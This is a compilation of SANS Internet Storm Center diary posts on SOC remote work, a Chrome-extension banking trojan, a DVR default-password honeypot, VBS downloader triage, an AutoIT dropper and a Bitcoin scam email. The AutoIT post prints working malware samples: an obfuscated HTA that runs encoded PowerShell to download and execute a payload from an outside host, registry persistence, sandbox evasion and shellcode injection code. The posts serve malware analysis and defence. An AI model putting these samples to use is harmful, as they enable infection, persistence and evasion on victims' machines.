Posted on Leave a comment

Remote SOC Workers Concerns, (Thu, Aug 31st)

As a SOC manager, you may need to start thinking about remote works for several reasons: Office move, larger talent pool, disaster recovery plan. Some scenarios may be short term to midterm solutions, here are some initial concerns I came up with when thinking about the problem.

 

Concern 1: Speed of responding

You IR team has to be able to complete its mission of detection and responding so will you be able to be at least able to this task.  A lot of this depends on the toolset you have deployed. If you are using a tool like GRR or others that have a web interface, it makes a response on a more limited system easier.

 

If your typical analysis starts with physically going to someone’s desktop without having an agent pre-deployed, then you will need to have someone be your “Hands” and get the data to a place where it can be analyzed.

 

Concern 2:Physical security at home office

A responders house typically doesn’t meet all the needs of many compliance/corporate policies.  You could require anyone that works remotely have to meet these requirements, or you will have to provide an option to remote into hardware that will not allow data to be copied out.  Virtual desktops or hardware desktops that are setting in the data center might make more since.  Having a server VM with the SANS SIFT might be a viable options to perform most of the analysis.

 

Concern 3: Secure access

SOCs typically have a very stringent access, so you need to make that you have appropriate controls. You may need to require individuals get a static IP from their ISP.  Obviously, multi-factor into the environment is a must.  

 

Concern 4: Collaboration and Mentoring

If your team will be remote for a short time, them building a strong comradery remotely is not a big deal, but if it permanent this can be a challenge.  Having a short dedicated meeting in the morning to discuss topics will help.  Training up IR staff is a little harder, have dedicated time where you have the analysist share their desktop and walk through the current incident they are working.

 

What concerns do you have and how have you addressed them?

 

 

 

Tom Webb

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted on Leave a comment

Second Google Chrome Extension Banker Malware in Two Weeks, (Tue, Aug 29th)

  1. Introduction

It seems that Google Chrome extensions have become quite the tool for banking malware fraudsters. Two weeks ago, an offender phoned a victim and asked him to install a supposedly new bank security module that, instead, was a malicious extension hosted at the Google Chrome app store aimed to steal victim’s banking credentials [1]. This week I received a report about a targeted email phishing campaign against another company with a suspicious attachment. The attachments, after the analysis detailed in today’s diary, revealed itself to be another Google Chrome extension prepared to steal banking credentials, credit card, CVV numbers and fraud “compensation tickets” (a popular and particular Brazilian payment method; we call it “boleto”) to divert payments.

To increase the success rate and entice the victim’s attention to the message, scammers used a previously hijacked company email account to threaten employees with a fake layoff list attached to the message in a “zip” file that contained the first part of the malware. I named it IDKEY due to the name of the extension it deploys.

  1. Threat Analysis

After analyzing many different malware parts and lots of obfuscated code, it was possible to understand the threat’s flow, since the phishing e-mail to the malicious actions, as seen in Figure 1. A textual description can be seen below:

  • The e-mail attachment “zip” file contains a “.vbs” obfuscated script that, once executed, collects system information and send to a C&C server;
  • Based on the received information, the C&C server decides whether the victim machine is a virtual machine (VM). If so, returns an URL to a non-malicious JPEG file. Otherwise, returns an URL to the second part of the malware;
  • The second file, supposedly another “zip”, is, in fact, an obfuscated VBE script, that is downloaded and executed;
  • The VBE script makes additional system checks and downloads a “zip” file (a real one this time) which contains a “Chrome” directory and a DLL;
  • The DLL is deployed and configured to load during user login;
  • The Google Chrome Extension is programmatically loaded into Google Chrome using the parameter “–load-extension”;
  • The malicious extensions, called IDKEY STOR (very suggestive name in English) starts to monitor all visited websites to identify sensitive information. When it matches specific strings, the fraud begins;
  • Credentials and credit card numbers are snatched and sent to the C&C server;
  • When the victim generates a compensation ticket (the “boleto” we talked earlier) which has a barcode, the malware intercepts the page loading, communicates with C&C and asks for a fraudulent barcode number. It then communicates with an open API on another financial institution in Brazil and has it generate a barcode image and overwrites the original one. As result, the payment will be diverted to an account chosen by fraudsters.

Figure 1 – IDKEY Malware Analysis

  1. Sandbox detection

One of the first malware actions done by the VBS attached to the phishing e-mail is collecting a bunch of machine information and sending it to the C&C server, as shown in Figures 2 and 3.

Figure 2 – Machine information collection

 

Figure 3 – Machine information being posted to the C&C server

The result for this HTTP Post request was the URL “hxxp://cdn.ahnegao.com.br/2017/07/casa.jpg” which points to a regular JPEG file – a clear strategy to mislead sandboxes. To bypass this control, it was enough to replace “VMWare” terms in the request to something else, as shown in Figure 4. This time, C&C returned us a URL to the next piece of malware.

Figure 4 – Bypassing sandbox detection

  1. JavaScript [de]obfuscation

Another part of the malware that caught my attention was how the Google Chrome Extension JavaScript code was obfuscated. It uses an array of strings in hexadecimal followed by a function that reorders the array. The array is then used all over the code, as seen in Figure 5. I saw this approach other times, but now I had to decode the source before advancing. It was not possible to read it otherwise.

Figure 5 – Malicious Google Extension snippet

Using the “nicefier” service JSNice [2], it was possible to better understand the source, as seen in Figure 6.

Figure 6 – After JSNice deobfuscation

Alas, reading the code is still far from easy because of the array reference approach used. To overcome this, it was necessary to create a “decode” function to map and replace all ‘array[“position”]’ references (like ‘_0xb33d[“0x0”]’), to their respective array position, as seen in Figure 7.

Figure 7 – JavaScript decoder

Loading this code, we had the decoded JavaScript printed to the console, as seen in Figure 8; it was finally possible to understand the malicious intentions prepared and described in this article.

Figure 8 – Source decoded

  1. Final words

While it is extremely necessary for developers, the option of manually loading Google Chrome extensions may pose a risk to the regular user who should be aware of browser warnings about extensions in developer mode, as in Figure 9. And again [1], in my opinion, Chrome should restrict extensions access to sensitive form fields, like passwords, unless it is explicitly consented by the user.

Should Google Chrome team be more explicit about the dangers posed by programmatically loaded extensions in their warning?

Figure 9 – Google Chrome Extension in developer mode warning

 

  1. IOCs

 

Files

Malicious Google Chrome Extension Files

MD5 (1.js) = 1d91e021e5989029ff0ad6dd595c7eb1
MD5 (2.js) = d996bdc411c936ac5581386506e79ff4
MD5 (3.js) = 59352276c38d85835b61e933da8de17b
MD5 (manifest.json) = c6157953f44bba6907f4827a1b3b4d0a

Other files

MD5 (myinside.dll) = 574322a51aee572f60f2d87722d75056
MD5 (uia.zip) = bae703565b4274ca507e81d3b623c808

Network

hxxp://cdn.ahnegao.com.br/2017/07/casa.jpg?1491404962
hxxp://storage.googleapis.com/fogoreal/uia.zip                       
hxxp://storate.googleapis.com/fogoreal/top019.zip                       
hxxps://tofindanotherrace.com/
hxxp://insidevx.net/log5.php?logins=did&s=ch
hxxp://insidevx.net/log5.php?logins=did&s=b

File System

%userprofile%appdataroamingmicrosoftwindowsstart menuprogramsstartup.vbs
%userprofile%myinside.dll
%userprofile%ext[Chrome|1.9.6]

Google Chrome

IDKEY STOR malicious extension deployed

  1. References

[1] https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/
[2] http://jsnice.org/


Renato Marinho
Morphus Labs| LinkedIn|Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted on Leave a comment

An Update On DVR Malware: A DVR Torture Chamber, (Mon, Aug 28th)

Last week, the fact that someone leaked 1700 or so IP addresses with default username/password caused some people to get excited about the issue of default telnet credentials again. Ever since the “Mirai” outbreak, we do see a pretty constant stream of requests for port 23 (and to some extent 2323 as well as 22) searching for systems with default credentials. When Mirai came out, I did a quick experiment testing how long it would take to have a DVR with default credentials infected. So I decided to repeat this experiment, to see if anything changed. Using an actual vulnerable DVR vs. a honeypot will be more realistic and provide better results.

I used an “Anrai” branded DVR with default configuration. This particular model accepts “root” logins with the well-known password “xc3511”. Many of the worms infecting these devices will disable telnet after a successful infection, to prevent others from exploiting the weak credentials. So to allow for continuous infections, I connected my DVR to a remote controlled power outlet, and power cycled it once every 5 minutes. I logged all traffic to and from the DVR. Here is a sketch of the setup:

DVR Torture Setup

So every 5 minutes, the DVR rebooted and was ready for new connections. A reboot takes a bit less than 30 seconds. Traffic from the DVR outbound was blocked by the firewall to prevent it from infecting other systems. I kept this running for a bit less than two days. Here are some of the basic statistics from the experiment:

Start Time Aug 24th 11:53 am
End Time Aug 26th 9:35 am
Data Collected 3,098 MBytes, 36 Million Packets
Time Active 45 hrs 42 min
Total connections to the DVR 10,143
Total login attempts using the “xc3511” password 1254 Different IPs (every 2 minutes)

So in short: Every 2 minutes the system was compromised by someone(thing) logging in using the correct credentials.

For the 1254 attacking IP addresses, Shodan had information for 592 of them. As expected, we do see our usual “suspects”:

Model / HTTP Banner Count
GoAhead-Webs 128
Dahua DVR 31
DD-WRT 21
micro-httpd 14
EnGenius Router 12
   

Notable manufacturers of the devices include TP-Link, AvTech, Synology, D-Link. In short, your usual “DO NOT CONNECT TO THE INTERNET” devices.

While I am calling the activity “Mirai,” dozens of variants hit the DVR. The geographic distribution of these systems matches what we saw early on with Mira (only counting the hosts that had Shodan information):

 

So in short: 1,700 additional vulnerable systems will not matter. We do see a pretty steady set of 100,000-150,000 sources participating in telnet scans. This problem isn’t going away anytime soon. If people haven’t heard yet about vulnerable DVRs and default passwords, then they will not read this article either. Variants like “Brickerbot,” which supposedly attempted to break vulnerable devices, are ineffective because most of these devices can not be “bricked” by overwriting a disk with “dd.” They may become temporarily unresponsive but will be fine after a reboot. Many of these devices are buggy enough, where the owner is used to regular reboots, and that is probably the only maintenance the owner will perform on these devices.

(ping me if you want a copy of the full pcap)


Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute
STI|Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted on Leave a comment

Malware analysis: searching for dots, (Sat, Aug 26th)

Reader Chris submitted a suspicious attachment. It is a 7-Zip file.

As you probably know, I like to do static analysis without extracting malware to disk, but by piping it into a chain of tools.

This can be done with 7-Zip too. Here is the content of the file:

It contains a single VBScript file: IMG_0107.vbs.

I can look at the script by extracting it (command e) and writing the output to stdout (option -so). This way, I can read the script without writing it to disk:

Take a look at the last line in the screenshot: it’s a simple obfuscation of the string .responseBody. This is a strong indication that this VBS script is a downloader.

When analyzing obfuscated source code like VBA and VBS, I like to grep for lines with a dot character (.), as this gives an overview of method calls:

Not only does this output clearly shows that this is a downloader that will write to disk and execute the payload, it also reveals URLs, a User Agent String and keywords separated with the string “Swing”.

Let’s deobfuscate the URLs first:

With “re-search.py -n str” I extract the strings:

Then I remove the double qoutes with sed:

And finally, I split the string with sed by replacing ^ with newline:

Unfortunately, the URLs were dead when I did the analysis.

I can extract the “keywords” with the same method:

From this we can deduce that the downloaded file is written to a temporary folder in file UUmDBYNd.exe.

Another method I like for quick analysis of obfuscated source code, is just to extract strings with my re-search.py tool:

 

Didier Stevens
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted on Leave a comment

Malicious AutoIT script delivered in a self-extracting RAR file, (Fri, Aug 25th)

Here is another sample that hit my curiosity. As usual, the infection vector was an email which delivered some HTML code in an attached file called “PO_5634_780.docx.html” (SHA1:d2158494e1b9e0bd85e56e431cbbbba465064f5a). It has a very low VT score (3/56)[1] and contains a simple escaped Javascript code:

document.write(unescape('%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D
%22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%30%3B%20%0A%75%72%6C%3D%68%74%74%70%73%3A%2F%2F%31%66%69%63%68%69%65
%72%2E%63%6F%6D%2F%3F%64%6A%39%38%66%66%35%36%68%32%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61
%72%73%65%74%3D%69%73%6F%2D%38%38%35%39%2D%31%22%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%2F%62%6F%64%79%3E%0A%3C%2F%68%74%6D%6C%3E%0A
%3C%2F%53%63%72%69%70%74%3E'))

Here is the decoded version:





It downloads a second malicious file from 1fichier.com which is a French file sharing service. The link points to an HTA file “PO_5634_780.docx.hta” (SHA1:74e892a0bc54f604c4876331ec27f5bd90a21ead) that has also a very poor VT score (4/58)[2]:





dim     sEUDM   :       dIM     wPRjb   :       sET     sEUDM   =       CReaTeoBjEct    (       Chr(&H57) & ChrW(&H53) & StrReverse(ChrW(&H63)) & Chr(&H72) & StrReverse(ChrW(&H49)) & StrReverse(ChrW(&H70)) & Chr(&H54) & Chr(&H2E) & StrReverse(ChrW(&H73)) & StrReverse(Chr(&H48)) & Chr(&H65) & ChrW(&H4C) & Chr(&H4C)       )       :       wPRjb   =       "       pOwERshell.exe  -ExecutiONpoLICy        BypAss  -NoProfILe      -wINDOWsTyLE      hiDdEn  -EncodeDcOmmAnD CQBTAGUAdAAtAEMATwBuAHQAZQBuAFQACQAtAFYAQQBsAFUAZQAJACgATgBlAHcALQBvAGIASgBlAEMAdAAgAHMAeQBTAHQARQBtAC4AbgBlAHQALgBXAGUAYgBjAEwAaQBFAG4AVAApAC4ARABPAHcAbgBMAE8AYQBEAEQAYQBUAEEAKAAJAB0gaAB0AHQAcAA6AC8ALwBhAHMAZQBtAGUAZAAuAG8AcgBnAC4AbQB4AC8AdABlAHMAdAAvAG8AbwAuAGUAeABlAB0gCQApAAkALQBlAE4AQwBPAEQASQBOAGcACQBiAFkAVABlAAkALQBwAEEAVABoAAkAHSAkAGUATgB2ADoAQQBsAGwAdQBzAGUAUgBTAHAAUgBPAGYASQBMAEUAXAA1AGcAYgAyAHMAdAAuAGUAeABlAB0gCQA7AAkAcwBUAGEAcgBUAAkAHSAkAEUATgB2ADoAQQBsAGwAVQBTAEUAcgBzAHAAcgBvAEYASQBsAEUAXAA1AGcAYgAyAHMAdAAuAGUAeABlAB0g    "       :       sEUDM.run       CHR     (       34      )       &       sEUDM.eXpANDeNVIronmENTSTrinGS(   Chr(&H25) & ChrW(&H43) & StrReverse(ChrW(&H6F)) & Chr(&H6D) & Chr(&H53) & StrReverse(ChrW(&H50)) & ChrW(&H45) & StrReverse(Chr(&H43)) & StrReverse(Chr(&H25))   )       &       ChR     (       34)       &       cHr     (       34      )       &       ChrW(&H2F) & StrReverse(Chr(&H43)) & StrReverse(ChrW(&H20))     &       wPRjb   &       CHr     (       34      )       ,       0       :       sET     sEUDM   =noTHing
SeLF.CLOSE


We can see that PowerShell is invoked with some Base64 encoded stuff which returns (once decoded and beautified):

set-content-value(new-object system.net.webclient).downloaddata(hXXp://asemed.org[.]mx/test/oo.exe ) 
-encoding byte 
-path    $env:allusersprofile5gb2st.exe
start     $env:allusersprofile5gb2st.exe

The file “oo.exe” (SHA1:85a2eb0375474b8180953966dedc9e8d10e2d815) is unknown on VT. It’s not only a PE file but a self-extracting RAR:

$ file oo.exe
oo.exe: PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive

Even if they contain PE headers, such files can still be parsed by a classic RAR decompressor:

$ unrar t oo.exe

UNRAR 5.30 beta 2 freeware      Copyright (c) 1993-2015 Alexander Roshal

Testing archive oo.exe

Setup="yu.exe"L'histoire de la série, située sur les continents fictifs de Westeros et Essos à la fin d'un été d'une dizaine d'années,
entrelace plusieurs intrigues. La première intrigue suit l'histoire des membres de plusieurs familles nobles, dans une guerre civile
pour conquérir le Trône de Fer du Royaume des Sept Couronnes.
La deuxième intrigue couvre l'histoire de Jon Snow et de la future
menace croissante de l'hiver approchant, des créatures mythiques et
légendaires venues du Nord du Mur de Westeros. La troisième raconte la
démarche de Daenerys Targaryen au sud d'Essos, la dernière représentante en exil de la dynastie
déchue en vue de reprendre le Trône de Fer. A travers ces personnages « moralement ambigus », la série explore les sujets liés au pouvoir politique, à la hiérarchie sociale,
la religion, la guerre civile, la sexualité, et à la violence en général.
L'histoire de la série, située sur les continents fictifs de Westeros et Essos à la fin d'un été d'une dizaine d'années,
entrelace plusieurs intrigues. La première intrigue suit l'histoire des membres de plusieurs familles nobles, dans une guerre civile
pour conquérir le Trône de Fer du Royaume des Sept Couronnes.
La deuxième intrigue couvre l'histoire de Jon Snow et de la future
menace croissante de l'hiver approchant, des créatures mythiques et
légendaires venues du Nord du Mur de Westeros. La troisième raconte la
démarche de Daenerys Targaryen au sud d'Essos, la dernière représentante en exil de la dynastie
déchue en vue de reprendre le Trône de Fer. A travers ces personnages « moralement ambigus », la série explore les sujets liés au pouvoir politique, à la hiérarchie sociale,
la religion, la guerre civile, la sexualité, et à la violence en général.
Silent=1
Game of Thrones, également désignée par le titre français de l'œuvre romanesque dont
elle est adaptée, Le Trône de fer (A Song of Ice and Fire), est une série télévisée
américaine médiéval-fantastique1 créée par David Benioff et D. B. Weiss, diffusée
depuis le 17 avril 2011 sur HBO. Il s'agit de l'adaptation de la série de romans
écrits par George R. R. Martin depuis 1996, saga réputée pour son réalisme et par
ses nombreuses inspirations tirées d’événements, lieux et personnages historiques réels,
tels que la guerre des Deux-Roses, le mur d'Hadrien, Henri Tudor, etc2.
Update=Ux9XQ4
L'histoire de la série, située sur les continents fictifs de Westeros et Essos à la fin d'un été d'une dizaine d'années,
entrelace plusieurs intrigues. La première intrigue suit l'histoire des membres de plusieurs familles nobles, dans une guerre civile
pour conquérir le Trône de Fer du Royaume des Sept Couronnes.
La deuxième intrigue couvre l'histoire de Jon Snow et de la future
menace croissante de l'hiver approchant, des créatures mythiques et
légendaires venues du Nord du Mur de Westeros. La troisième raconte la
démarche de Daenerys Targaryen au sud d'Essos, la dernière représentante en exil de la dynastie
déchue en vue de reprendre le Trône de Fer. A travers ces personnages « moralement ambigus », la série explore les sujets liés au pouvoir politique, à la hiérarchie sociale,
la religion, la guerre civile, la sexualité, et à la violence en général.
Path=%temp%56070745
Setup=mln.exe wla-kxl
Game of Thrones, également désignée par le titre français de l'œuvre romanesque dont
elle est adaptée, Le Trône de fer (A Song of Ice and Fire), est une série télévisée
américaine médiéval-fantastique1 créée par David Benioff et D. B. Weiss, diffusée
depuis le 17 avril 2011 sur HBO. Il s'agit de l'adaptation de la série de romans
écrits par George R. R. Martin depuis 1996, saga réputée pour son réalisme et par
ses nombreuses inspirations tirées d’événements, lieux et personnages historiques réels,
tels que la guerre des Deux-Roses, le mur d'Hadrien, Henri Tudor, etc2.

Testing     dqj.jpg                                                   OK
Testing     wla-kxl                                                   OK
Testing     mln.exe                                                   OK
Testing     oms.bmp                                                   OK
Testing     pma.mp4                                                   OK
Testing     ttd.icm                                                   OK
Testing     btm.ico                                                   OK
Testing     aht.ico                                                   OK
Testing     iua.xl                                                    OK
Testing     onm.docx                                                  OK
Testing     djv.bmp                                                   OK
Testing     rbr.docx                                                  OK
Testing     kqx.icm                                                   OK
Testing     ems.ico                                                   OK
Testing     vtt.ico                                                   OK
Testing     peq.dat                                                   OK
Testing     mlq.mp4                                                   OK
Testing     dsh.xl                                                    OK
Testing     xgr.ppt                                                   OK
Testing     uds.ico                                                   OK
Testing     xdo.mp3                                                   OK
Testing     mix.jpg                                                   OK
Testing     rkp.mp4                                                   OK
Testing     lks.bmp                                                   OK
Testing     xqw.mp3                                                   OK
Testing     hfd.dat                                                   OK
Testing     peg.ppt                                                   OK
Testing     msh.ico                                                   OK
Testing     qed.docx                                                  OK
Testing     bxw.xl                                                    OK
Testing     jhb.xl                                                    OK
Testing     vdb.ico                                                   OK
Testing     fts.bmp                                                   OK
Testing     wgf.pdf                                                   OK
Testing     rnj.mp3                                                   OK
Testing     ate.ico                                                   OK
Testing     qov.mp3                                                   OK
Testing     tcq.ico                                                   OK
Testing     bhf.jpg                                                   OK
Testing     kub.icm                                                   OK
Testing     oem.ppt                                                   OK
Testing     tpx.bmp                                                   OK
Testing     oxj.txt                                                   OK
Testing     jbf.jpg                                                   OK
Testing     cnl.ico                                                   OK
Testing     gfb.dat                                                   OK
Testing     bgg.pdf                                                   OK
Testing     ocl.jpg                                                   OK
Testing     jlh.txt                                                   OK
Testing     aus.docx                                                  OK
Testing     djj.dat                                                   OK
Testing     yu.exe                                                    OK
All OK

If the user extracts the RAR file on a Windows computer, plenty of different files will be displayed with popular extensions and icons. We will see later that some of them are fake, others are used by the malware:

To create an SFX file[3], you must provide a configuration file that will describe what to do when the content is unpacked. Amongst the French text, we can see what will be executed:

Setup=“yu.exe"
Silent=1
Update=Ux9XQ4
Path=%temp%56070745
Setup=mln.exe wla-kxl

The PE file yu.exe (SHA1:a8e69984f32ede2afa0b7700ce0a7c772ad61de9) is another self-extracting RAR file. We can apply the same technique to collect information:

Setup="PO_5634_780.DOCX
Silent=1
Update=Um14Y
Path=%temp%87745999
Setup=nut.exe bdl-wgi

Once executed, it spawns a Word process to display the document (not malicious) just to lure the victim:


In the background, it executes “nut.exe”. Note that mln.exe and nut.exe are the same binary (SHA1: cae4e8c730de5a01d30aabeb3e5cb2136090ed8d)[4]. they are the AutoIT script engine:

The AutoIT tool is first called with a file present in the RAR archive:

wla-kxl (SHA1:a84de9c8282518c3f12d48b3c6c9f662fee18965)
bdl-wgi (SHA1: ef061a0d5d5341a6f189c79456f71063fd64abb0)

There are used to generate a new AutoIT scripts stored in %TEMP%. This  script is obfuscated but here are some interesting snippets of code:

It installs itself in ‘Run’ to get persistence:

If IsAdmin() Then
   RegWrite("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun", $576E7ACF370C475C1F7CFFC8287D4894, "REG_SZ", $9355FBBA246C8217C04EE3075C218909 & "" & $1B6FE00D126CF844740F878410AD34F2 & " " & FileGetShortName(FileGetShortName($9355FBBA246C8217C04EE3075C218909 & "" & $F2EE618C99E95AD0E9BB8DA5F76EE4DC)))
Else
   RegWrite("HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun", $576E7ACF370C475C1F7CFFC8287D4894, "REG_SZ", $9355FBBA246C8217C04EE3075C218909 & "" & $1B6FE00D126CF844740F878410AD34F2 & " " & FileGetShortName($9355FBBA246C8217C04EE3075C218909 & "" & $F2EE618C99E95AD0E9BB8DA5F76EE4DC))
   RegWrite("HKCU64SoftwareMicrosoftWindowsCurrentVersionRun", $576E7ACF370C475C1F7CFFC8287D4894, "REG_SZ", $9355FBBA246C8217C04EE3075C218909 & "" & $1B6FE00D126CF844740F878410AD34F2 & " " & FileGetShortName($9355FBBA246C8217C04EE3075C218909 & "" & $F2EE618C99E95AD0E9BB8DA5F76EE4DC))
EndIf

Sandbox detection:

Func _S0xF2781DA828DC14A0F0FEF5D4A4426C98()
  $BFCF7AB65257B2F6022D9D4CE5EEC7AC = "VMwaretray.exe"
  $842A0608C474DE8920A18FD7706EC8CD = "Vbox.exe"
  If DriveSpaceFree("d:") < 1 And ProcessExists("VMwareUser.exe") Then
    Exit
  EndIf
  If DriveSpaceFree("d:") < 1 And ProcessExists("VMwareService.exe") Then
    Exit
  EndIf
  If ProcessExists("VBoxTray.exe") Or ProcessExists("VBo" & "xServ" & "ice.exe") Or ProcessExists("vpcmap.exe") Or ProcessExists("vpcmap.exe") Then
    Exit
  EndIf
  If ProcessExists($BFCF7AB65257B2F6022D9D4CE5EEC7AC) Then
    Exit
  EndIf
  If ProcessExists($842A0608C474DE8920A18FD7706EC8CD) Then
    Exit
  EndIf
EndFunc

Inject a DLL and call a function:

Func _S0x5498F30D3302580A94D5B06B04E62B42($Binary, $comd,$inject)
  if $Binary = "" Then Exit
  $ASM = "0x60E84E0000006B00650072006E0065006C003300320000006E00740064006C006C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005B8BFC6A42E8BB0300008B54242889118B54242C6A3EE8AA03000089116A4AE8A103000089396A1E6A3CE89D0300006A2268F4000000E8910300006A266A24E8880300006A2A6A40E87F0300006A2E6A0CE8760300006A3268C8000000E86A0300006A2AE85C0300008B09C701440000006A12E84D030000685BE814CF51E8790300006A3EE83B0300008BD16A1EE8320300006A40FF32FF31FFD06A12E823030000685BE814CF51E84F0300006A1EE8110300008B098B513C6A3EE8050300008B3903FA6A22E8FA0200008B0968F80000005751FFD06A00E8E80200006888FEB31651E8140300006A2EE8D60200008B396A2AE8CD0200008B116A42E8C402000057526A006A006A046A006A006A006A00FF31FFD06A12E8A902000068D03710F251E8D50200006A22E8970200008B116A2EE88E0200008B09FF7234FF31FFD06A00E87E020000689C951A6E51E8AA0200006A22E86C0200008B118B396A2EE8610200008B096A406800300000FF7250FF7734FF31FFD06A36E8470200008BD16A22E83E0200008B396A3EE8350200008B316A22E82C0200008B016A2EE8230200008B0952FF775456FF7034FF316A00E81002000068A16A3DD851E83C02000083C40CFFD06A12E8F9010000685BE814CF51E8250200006A22E8E70100008B1183C2066A3AE8DB0100006A025251FFD06A36E8CE010000C70100000000B8280000006A36E8BC010000F7216A1EE8B30100008B118B523C81C2F800000003D06A3EE89F01000003116A26E8960100006A2852FF316A12E88A010000685BE814CF51E8B601000083C40CFFD06A26E8730100008B398B098B71146A3EE86501000003316A26E85C0100008B098B510C6A22E8500100008B090351346A46E8440100008BC16A2EE83B0100008B0950FF77105652FF316A00E82A01000068A16A3DD851E85601000083C40CFFD06A36E8130100008B1183C20189116A3AE8050100008B093BCA0F8533FFFFFF6A32E8F40000008B09C701070001006A00E8E500000068D2C7A76851E8110100006A32E8D30000008B116A2EE8CA0000008B0952FF7104FFD06A22E8BB0000008B3983C7346A32E8AF0000008B318BB6A400000083C6086A2EE89D0000008B116A46E894000000516A045756FF326A00E88600000068A16A3DD851E8B200000083C40CFFD06A22E86F0000008B098B51280351346A32E8600000008B0981C1B000000089116A00E84F00000068D3C7A7E851E87B0000006A32E83D0000008BD16A2EE8340000008B09FF32FF7104FFD06A00E82400000068883F4A9E51E8500000006A2EE8120000008B09FF7104FFD06A4AE8040000008B2161C38BCB034C2404C36A00E8F2FFFFFF6854CAAF9151E81E0000006A406800100000FF7424186A00FFD0FF742414E8CFFFFFFF890183C410C3E82200000068A44E0EEC50E84B00000083C408FF742404FFD0FF74240850E83800000083C408C355525153565733C0648B70308B760C8B761C8B6E088B7E208B3638471875F3803F6B7407803F4B7402EBE78BC55F5E5B595A5DC35552515356578B6C241C85ED74438B453C8B54287803D58B4A188B5A2003DDE330498B348B03F533FF33C0FCAC84C07407C1CF0D03F8EBF43B7C242075E18B5A2403DD668B0C4B8B5A1C03DD8B048B03C55F5E5B595A5DC3C300000000"
  Local $BufferASM = DllStructCreate("byte[" & BinaryLen($ASM) & "]")
  Local $binBuffer=DllStructCreate("byte[" & BinaryLen($Binary) & "]")
  DllStructSetData($BufferASM, 1, $ASM)
  DllStructSetData($binBuffer, 1, $Binary)
  Local $Ret = DllCall("user32.dll", "int", "CallWindowProcW", "ptr", DllStructGetPtr($BufferASM), "wstr", $inject, "ptr", DllStructGetPtr($binBuffer), "int", 0, "int", 0)
EndFunc

Here is an overview of infection process:

Based on the captured network traffic, it installs a JBifrost RAT[5]. The use of AutoIT to perform malicious activities is not brand new[6] but in this case, we are facing multiple (simple) techniques used to deliver the malware and most files are not detected by many antivirus engines. Do we have to consider AutoIT as a dangerous tool? It depends on your environment: if you don’t use it to automate tasks on your network, it must be banned and the SHA1 hash cae4e8c730de5a01d30aabeb3e5cb2136090ed8d can be considered as an interesting IOC to keep an eye on!

[1] https://www.virustotal.com/#/file/fad17915219a23a842fda9e205d86859232479d673932f0ce910f8cb7bbc80dd/detection
[2] https://www.virustotal.com/#/file/531e2f2438a9ff58a1f3ff5abeac9457ab9884997589f06a6febd4b58b384a03/detection
[3] http://www.msfn.org/board/topic/34343-winrar-sfx-commands/
[4] https://www.virustotal.com/#/file/fb73a819b37523126c7708a1d06f3b8825fa60c926154ab2d511ba668f49dc4b/detection
[5] https://blog.fortinet.com/2016/08/16/jbifrost-yet-another-incarnation-of-the-adwind-rat
[6] https://www.carbonblack.com/2017/04/05/latest-malware-uses-compiled-autoit-script-masquerade-photoshop-cs6-installer/

Xavier Mertens (@xme)
ISC Handler – Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted on Leave a comment

Free Bitcoins? Why not?, (Thu, Aug 24th)

Since the invention of the Internet (or e-mail) we have been seeing various scams that try to entice the user to transfer his hard-earned money to a scammer’s account.

There are many, many forms of the old fashioned advance-fee (419) scam where the victim is usually asked to transfer money to attacker’s account for whatever purpose we can think of: it can be a dead Prince’s legacy or money that a stranger in distress needs. 

Of course, with all crypto currencies flying around, the bad guys saw an opportunity as well, with the major advantage being difficult traceability of crypto currency transactions.

Couple of days ago, one of our readers, Jason Killam sent in an example of a scam (although, a bit poorly written) but where the attacker was asking for few USD in Bitcoins – the e-mail is shown below:

Hello, my name is Arseny Golorich, I live in the country Belarus, Minsk, we are a rather poor country. On July 26, the BTC-E Crypto-Currency Exchange closed, and I can not get my money back. It was closed by the FBI and illegally appropriated all of our funds. There were my last 2 Bitcoins on which I earned and traded on the stock exchange. Now I am without means for existence, I am starving, I ask to help, who can. On the Internet, I found the emails of the wealthy people of America and decided to write to you, for you a few $ are worthless, but they will help me a lot to start earning again on the exchange. Thank you so much for reading!

My Bitcoin Wallet – 1MY1Fso8SW9XTPCca7oLEBUWFJRZWNK9Qs

For the help you can use absolutely safe resources:
https://localbitcoins.com/
https://www.coinbase.com/

As we can see, this is just a poor attempt where the attacker is practically begging for Bitcoins. He was, though, nice enough to provide the victim with links on purchasing Bitcoins.

We can search for his wallet at https://blockchain.info/address/1MY1Fso8SW9XTPCca7oLEBUWFJRZWNK9Qs and it appears that at least this attempt was completely unsuccessful as there were no transaction of any Bitcoins to this account.

However, who knows how successful (or not), this particular attacker is – for him, the nice thing about Bitcoins is that he can create a new wallet for every victim, so it becomes much more difficult not only to trace the transactions but also to see what his total gain is, especially if he decides further down the line to use notorious mixing services.

Bitcoin mixing services are anonymous services that allow anyone to send Bitcoins to them. For a small fee, such services collect multiple transactions and then mix them and divide into smaller/different outgoing transactions to new wallets. This makes tracing very difficult (and, depending on the mixing service maybe impossible) and as such is the perfect way of laundering Bitcoins.

A chicken and egg problem is, though, that the attacker must really trust the mixing service that it will do what it claims to be doing – because once the Bitcoins have been sent, the attacker could also be a victim of the mixing service operator, in case he/she decides to simply keep Bitcoins.

In any case, one thing I am sure is that various scammers will happily embrace crypto currencies, in case they have not done so already.

Have you experienced similar scams or attacks that were new or you found them interesting? Let us know!


Bojan
@bojanz
INFIGO IS

